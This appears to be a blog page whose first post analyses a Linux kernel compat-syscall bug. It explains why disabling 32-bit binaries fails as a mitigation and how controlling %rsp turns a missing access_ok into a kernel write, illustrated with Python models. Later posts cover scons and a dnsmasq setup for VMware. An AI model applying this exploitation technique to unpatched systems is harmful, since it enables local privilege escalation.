This function is only called by compat-mode syscalls, so current is assumed to be a 32-bit process, in which case regs->sp, the user stack pointer, will be a 32-bit quantity. Thus, if we subtract a small len, the result should still fit in 32 bits, which, on a 64-bit system, means it is guaranteed to fall within the user address space.

Because of this, some callers of compat_alloc_user_space were lazy, and did not call access_ok (or a function which called access_ok) to check that the result of compat_alloc_user_space fell within the user address space.

However, it turned out that some call sites in the kernel called compat_alloc_user_space with a user-controlled len value, allowing the subtraction to wrap around. On a 64-bit system, the kernel lives in the top four gigabytes of memory, and so this wraparound is enough for a user to cause compat_alloc_user_space to return a pointer into the kernel’s address space.
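The wraparound is easy to see with a little arithmetic. Here is a minimal Python sketch that models the subtraction as 64-bit unsigned arithmetic. The stack pointer, the two lengths, and the USER_LIMIT boundary are illustrative assumptions of mine, not values taken from the kernel source or from the exploit:

```python
MASK64 = (1 << 64) - 1
USER_LIMIT = 1 << 47          # assumed user/kernel boundary, for illustration only


def compat_alloc_user_space(sp, length):
    """Model of `regs->sp - len`, truncated to 64 bits like a pointer."""
    return (sp - length) & MASK64


def looks_like_user_pointer(addr):
    """Rough stand-in for the access_ok check the lazy callers skipped."""
    return addr < USER_LIMIT


sp = 0xFFFFD000               # a plausible 32-bit user stack pointer

small = compat_alloc_user_space(sp, 64)             # ordinary request
wrapped = compat_alloc_user_space(sp, 0xFFFFE000)   # user-controlled, larger than sp

print(hex(small), looks_like_user_pointer(small))
print(hex(wrapped), looks_like_user_pointer(wrapped))
```

With a small length the result stays just below the stack pointer. Once the length exceeds the stack pointer, the subtraction goes negative and the truncated result lands at the very top of the 64-bit address space.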

Moreover, it turned out that the functions that used a user-controlled len also did not check access_ok on the result of the allocation. In particular, Linux 2.6.26 introduced the compat_mc_getsockopt function, which called compat_alloc_user_space with a user-controlled length and then copied user-controlled data to this pointer. It is this function which the public exploit targeted.

Disabling 32-bit binaries doesn’t help

When an exploit was released for this bug, many sources circulated a mitigation: Disable 32-bit binaries on a system. Prevent compat-mode processes from running, the logic goes, and you prevent anyone from making a compat-mode syscall that triggers the vulnerable path.

This mitigation indeed prevented the public exploit from working (it included 32-bit inline assembly, and so couldn’t even easily be recompiled as a 64-bit binary), and many observers seemed to believe it closed the bug entirely.

However, this was not the case! It turns out, on an amd64 system, a 64-bit process can still make a compat-mode system call using the int $0x80 instruction, which is the traditional 32-bit syscall mechanism! Even though the process is running in 64-bit mode, int $0x80 redirects to the compat-mode syscall table.

After realizing this, modifying the public exploit to work when compiled in 64-bit mode was a simple matter of porting the inline assembly, and changing a small handful of types. I’ve posted the modified exploit and the diff against the original for the curious.

The integer overflow is totally irrelevant

Once you’ve realized that you can make compat-mode system calls from a 64-bit process, a little bit of thought reveals something else interesting. compat_alloc_user_space subtracts the len value off of the userspace stack pointer. Previously, we relied on subtracting a large value from a 32-bit stack pointer in order to end up with a kernel pointer. However, while a 32-bit process is limited to a 32-bit stack pointer, a 64-bit process can write a full 64-bit value into %rsp, and thus regs->sp! There’s no need for underflow at all: you can just write a 64-bit value into %rsp and do an int $0x80, and make compat_alloc_user_space return any value you please!

The condition for exploitability thus drops from “user-controlled len and no access_ok” to simply “no access_ok”.
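To make that concrete, here is a small Python sketch of how a 64-bit process would pick its stack pointer when len is a fixed constant it cannot influence. The target address and the length are hypothetical values chosen for illustration:

```python
MASK64 = (1 << 64) - 1


def compat_alloc_user_space(sp, length):
    """Model of `regs->sp - len`, truncated to 64 bits like a pointer."""
    return (sp - length) & MASK64


def sp_for_target(target, length):
    """Value to load into %rsp so that the allocation lands on `target`."""
    return (target + length) & MASK64


target = 0xFFFFFFFF81234560   # hypothetical kernel address
length = 40                   # hypothetical fixed size, not attacker-controlled

sp = sp_for_target(target, length)
print(hex(sp), "->", hex(compat_alloc_user_space(sp, length)))
```

No wraparound is involved here. The only thing the attacker needs is that nobody checks the returned pointer.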

This is interesting, because it turns out that some very old kernels, before 2.6.11, including RHEL 4, have the following function:

int siocdevprivate_ioctl(unsigned int fd, unsigned int cmd, unsigned long arg)
{
        struct ifreq __user *u_ifreq64;

        ...
        u_ifreq64 = compat_alloc_user_space(sizeof(*u_ifreq64));

        /* Don't check these user accesses, just let that get trapped
         * in the ioctl handler instead.
         */
        copy_to_user(&u_ifreq64->ifr_ifrn.ifrn_name[0], &tmp_buf[0], IFNAMSIZ);
        __put_user(data64, &u_ifreq64->ifr_ifru.ifru_data);

        return sys_ioctl(fd, cmd, (unsigned long) u_ifreq64);
}

Remember, we can make compat_alloc_user_space return an arbitrary value. The copy_to_user will call access_ok and fail, but that return value will be discarded, and the __put_user will scribble 32 bits of user-controlled data at a user-controlled address. Bingo, local root.
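The difference between the two stores can be modeled in a few lines of Python. This is a toy sketch, not kernel code: the dictionary standing in for memory, the USER_LIMIT boundary, the function names ending in _model or _unchecked, and the chosen address are all assumptions for illustration:

```python
USER_LIMIT = 1 << 47      # assumed user/kernel boundary, for illustration only
IFNAMSIZ = 16             # size of the interface-name field

memory = {}               # toy address space: address -> stored value


def access_ok(addr, size):
    """True if [addr, addr + size) lies entirely below the user limit."""
    return addr + size <= USER_LIMIT


def copy_to_user(dst, data):
    """Checked copy; returns the number of bytes NOT copied (0 on success)."""
    if not access_ok(dst, len(data)):
        return len(data)
    for offset, byte in enumerate(data):
        memory[dst + offset] = byte
    return 0


def put_user_unchecked(value, dst):
    """Stand-in for __put_user: stores without calling access_ok."""
    memory[dst] = value


def siocdevprivate_model(u_ifreq64, name, data64):
    """Mirrors the two stores in the function above."""
    copy_to_user(u_ifreq64, name)                      # result discarded
    put_user_unchecked(data64, u_ifreq64 + IFNAMSIZ)   # always lands


kernel_ptr = 0xFFFFFFFF81000000    # hypothetical attacker-chosen address
siocdevprivate_model(kernel_ptr, b"eth0".ljust(IFNAMSIZ, b"\0"), 0xDEADBEEF)
print({hex(addr): hex(val) for addr, val in memory.items()})
```

The checked copy refuses to touch the kernel address, but because its result is thrown away, execution carries on to the unchecked store, which is the only write that ends up in the toy memory.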

It turns out this function was present in Linux 2.4.x, too, meaning that this exploit even affected RHEL3 and anyone else still running a 2.4-based system!

Based on these observations, I’ve produced a working proof-of-concept exploit for RHEL4, adapted from the released exploit for RHEL5. Contact me if you’re interested, but it’s pretty straightforward.

Closing notes

As far as I know, neither of these facts has been publicly documented prior to this post. I shared this information with Red Hat, and they requested I keep it private until they released fixes for RHEL 3, which happened last week. I would not be at all surprised to learn that someone else has private exploits that incorporate either or both of these observations, though.

One important moral here is you must be very careful when declaring a system unaffected by a vulnerability, or declaring a mitigation to be complete. Software systems have gotten tremendously complex, and it’s often impossible to be totally confident you understand every last way an attacker could tickle a vulnerability.

Nov 30th, 2010

Why scons is cool

I’ve recently started playing with scons a little for some small personal projects. It’s not perfect, but I’ve rapidly come to the conclusion that it’s probably a far better choice than make in many cases. The main exceptions would be cases where you need to integrate into legacy build systems, or if asking or expecting developers to have scons installed is unreasonable for some reason.

The main reason that scons is cool to me, and the thing that makes it fundamentally different from make, is the introduction of actual scoping.

make has a single global scope. This is one of the main reasons that people write recursive Makefiles: by giving you one file per directory, you get one scope per directory, which makes it possible to have per-directory pattern rules, variables, and all that other stuff, without driving yourself insane.

make’s awful syntax, confusing varieties of variable, whitespace-sensitivity, and all the other things that people love to bitch about are annoying, but to my mind, the single scope that makes recursive Makefiles the dominant (and, really, the only scalable) paradigm is the one thing that really sucks.

scons solves this by baking various kinds of scoping into the tool. scons lets you include sub-build-scripts (typically named SConscript, by convention). Those scripts run in their own namespace and can establish their own variables, rules, etc., but the end result is then merged back into the global rule list (handling sub-directory paths intelligently), so that the scheduler can work globally, instead of having to recurse.

Furthermore, because of this explicit scoping, you can pass variables, including targets, between build files, letting you explicitly set up cross-directory dependencies or share CFLAGS or other variables, making it easy for different directories to share exactly as much or as little configuration as you want.
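As a rough sketch of what that looks like, here is a three-file layout using scons’s Export, Import, Return, and SConscript functions. The directory names, source files, and targets are hypothetical, and the fragments only make sense when run by scons itself, which supplies these names without any imports:

```python
# --- SConstruct (top level) ---
env = Environment(CFLAGS=['-O2'])
Export('env')                            # share the environment with sub-scripts

# Each SConscript runs in its own namespace and hands back what it built.
libfoo = SConscript('lib/SConscript')
Export('libfoo')
SConscript('app/SConscript')

# --- lib/SConscript ---
Import('env')
libfoo = env.StaticLibrary('foo', ['foo.c'])
Return('libfoo')

# --- app/SConscript ---
Import('env', 'libfoo')
# The library target from lib/ is an explicit, cross-directory dependency.
env.Program('app', ['main.c'] + libfoo)
```

Nothing leaks between the two sub-scripts except what is explicitly exported or returned, yet all three files end up in one dependency graph.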

In addition, scons has the concept of “build environments”, which are objects that include build rules, variables, and so on. By reifying what make just represents as the global environment into objects, it makes it much easier to scope and program things. For example, if you have a set of targets that should be built using the global default rules, except with debugging enabled, you can do:

myenv = env.Clone()
myenv.Append(CFLAGS = ['-g'])
myenv.Program(...)

By making it (optionally) explicit which sets of rules and variables are being used in each place, it becomes much easier to share multiple kinds of targets and rule sets in a single file, without necessitating lots of sub-files just for scoping, as make tends to.

scons is cool for a bunch of reasons. It eliminates most of the stupid little annoyances you’ve probably had with make. But, in my mind, this is the thing that makes it cool. They’ve added sane scoping to the build tool, so that you can construct non-recursive build systems without going insane.

I’ll definitely be considering scons for any new projects I write going forward. I hate make, and this definitely feels like a path forward.

Nov 7th, 2010

Configuring dnsmasq with VMware Workstation

I love VMware Workstation. I keep VMs around for basically every version of every major Linux distribution, and use them heavily for all kinds of kernel testing and development.

This post is a quick writeup of my networking setup with VMware Workstation, using dnsmasq to assign my VMs addresses and provide a DNS server to resolve VM addresses.

The objective

I want to be able to resolve my VMs’ hostnames so that I can ssh to them, or run other network services and access them from the host. I could just assign static addresses and put them in /etc/hosts, but that’s totally lame, and liable to be a source of error and frustration, because I have dozens of VMs, and add and remove them frequently.

We’re going to set things up so that when VMs get addresses from DHCP, their hostnames automatically become resolvable, using the .vmware domain. To do this, we’re going to set up a piece of software called dnsmasq, which is a flexible DNS and DHCP server, designed for basically exactly this purpose.

The setup

Because I use my VMs for local testing, I just keep most of them on a local NAT on my machine. I configure that virtual network inside VMware as follows (run vmware-netconfig, or follow the appropriate menus):

Note how I disable “Use local DHCP service to distribute IP addresses to VMs”: we’re going to set up dnsmasq to provide DHCP, so we don’t want it fighting with VMware’s.

Notice that the subnet I’m using here is 172.16.37.* — if you choose a different one, you’ll need to adjust accordingly later.

Configuring dnsmasq

Then, I install dnsmasq, and configure /etc/dnsmasq.conf as follows:

listen-address=172.16.37.1
listen-address=127.0.0.1
no-dhcp-interface=lo

server=192.168.1.1
local=/vmware/

no-hosts
no-resolv

domain=vmware
dhcp-fqdn

dhcp-range=172.16.37.3,172.16.37.200,12h
dhcp-authoritative
dhcp-option=option:router,172.16.37.2

Here’s what each of those lines means, in order:

listen-address=172.16.37.1
listen-address=127.0.0.1
no-dhcp-interface=lo

We don’t want dnsmasq serving DHCP or DNS to the outside world or other virtual networks, so we tell it to listen only on the loopback interface (so that we can talk to it from the host) and on the virtual network we set up in the previous step. We don’t want it serving DHCP to localhost, though, so we tell it not to.

server=192.168.1.1
local=/vmware/

Here we tell dnsmasq how to forward DNS requests to the outside world. We’re going to be using dnsmasq as our primary nameserver, and having it forward requests for things it doesn’t understand to a real DNS server. In my case, that’s my LAN’s router, at 192.168.1.1. The local line tells dnsmasq that the .vmware domain is local, and it should never forward requests to resolve things in that domain.

If I needed something more complicated, it might be possible to use the resolv-file option or similar, but I don’t, personally.

no-hosts
no-resolv

These options tell dnsmasq not to look at resolv.conf or /etc/hosts when resolving names — we want it only to resolve VMs itself, and to forward everything else.

domain=vmware
dhcp-fqdn

This tells dnsmasq to assign the .vmware domain to hosts it hands out DHCP to, so that we can resolve VMs in the .vmware domain.

dhcp-range=172.16.37.3,172.16.37.200,12h
dhcp-authoritative

Next, we configure the DHCP server. We give it a range of addresses to assign on the subnet we created earlier. I stop at .200, so that I can leave the last few open for static IPs if I need them for some reason, and we start at .3, because .1 is the host and .2 is the address of VMware’s router. dhcp-authoritative enables some optimizations when dnsmasq knows it is the only DHCP server around.

dhcp-option=option:router,172.16.37.2

Finally, we need dhcp-option to tell DHCP clients to use the VMware-provided router at .2 as their gateway, instead of using the host, at .1. We could configure the host to be a NAT server using Linux’s NAT, but that’s outside the scope of this document.
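If you picked a different subnet in VMware, the address-dependent lines all change together. Here is a minimal Python sketch that derives them from the subnet, assuming the same layout as above (.1 for the host, .2 for VMware’s router, DHCP from .3 up to .200). The function name and its parameters are my own invention for illustration, not part of dnsmasq:

```python
import ipaddress


def dnsmasq_lines(subnet, upstream="192.168.1.1", last_dynamic=200):
    """Return the address-dependent dnsmasq.conf lines for a VMware subnet."""
    base = ipaddress.ip_network(subnet).network_address
    host, router = base + 1, base + 2          # .1 is the host, .2 VMware's router
    first, last = base + 3, base + last_dynamic
    return [
        f"listen-address={host}",
        "listen-address=127.0.0.1",
        f"server={upstream}",
        f"dhcp-range={first},{last},12h",
        f"dhcp-option=option:router,{router}",
    ]


for line in dnsmasq_lines("172.16.37.0/24"):
    print(line)
```

The remaining options (no-dhcp-interface, local, no-hosts, no-resolv, domain, dhcp-fqdn, dhcp-authoritative) don’t mention any addresses, so they can be copied unchanged.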

Configuring the host

Now, we need to configure the host to use dnsmasq as our DNS server. This is a simple matter of telling the host to use 127.0.0.1 as our DNS server, and to add .vmware to our search path. If we’re editing resolv.conf directly, it would look like:

search vmware
nameserver 127.0.0.1

Configuring guests

We need to configure our guests to send a hostname along with their DHCP requests, so that dnsmasq can add them to its address table. How to do this varies by OS, but most modern OSes do it automatically. If they don’t, here are a few hints:

For RHEL-based distros, edit /etc/sysconfig/network-scripts/ifcfg-INTERFACE, and add a line like

 DHCP_HOSTNAME=centos-5-amd64

For most other Linux distributions, you can often edit dhclient.conf (usually in /etc/ or /etc/dhclient/) to include:

 send host-name "centos-5-amd64";

Or, with a recent dhclient,

 send host-name "<hostname>";

will make it look up the machine’s actual hostname.

Conclusions

That’s all there is to it. This is a pretty simple setup, but hopefully someone else will find this useful. If you need dnsmasq to do something more subtle, the documentation is mostly quite good.

Oct 24th, 2010